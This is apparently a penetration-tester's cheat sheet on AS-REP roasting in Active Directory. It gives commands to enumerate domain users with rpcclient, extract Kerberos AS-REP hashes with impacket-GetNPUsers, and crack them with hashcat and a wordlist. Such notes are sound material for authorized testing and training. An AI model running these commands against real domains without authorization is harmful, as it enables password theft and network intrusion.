AS-REP Roasting

AS-REP roasting takes advantage of a known weakness in the Kerberos authentication protocol that can be exploited during initial authentication with a Key Distribution Center (KDC). AS-REP roasting allows a malicious actor to retrieve the password hash of any Kerberos user accounts that have the “Do not require Kerberos preauthentication” option enabled.

Get a list a AD usernames

Use ldapsearch, NSE scripts on LDAP (see Active Directory), Enum4Linux, rpcclient in Samba page, etc.

rpcclient -N -U "" $IP
enumdomusers

Extract hashes for users that have “Do not require Kerberos preauthentication” option

See impacket-GetNPUsers.

impacket-GetNPUsers -no-pass -dc-ip $DC_IP $DOMAIN/ -usersfile users.txt -outputfile hashes.txt

💡 Seen in a demo.

impacket-GetNPUsers -request ${DOMAIN}/ -usersfile reproastable.txt -format hashcat

Crack hashes

See Hashcat.

HASH=hashes.txt
TYPE=18200
WL=/usr/share/wordlists/rockyou.txt

hashcat -O -m $TYPE -a 0 $HASH $WL
hashcat -O -m $TYPE -a 0 $HASH $WL --show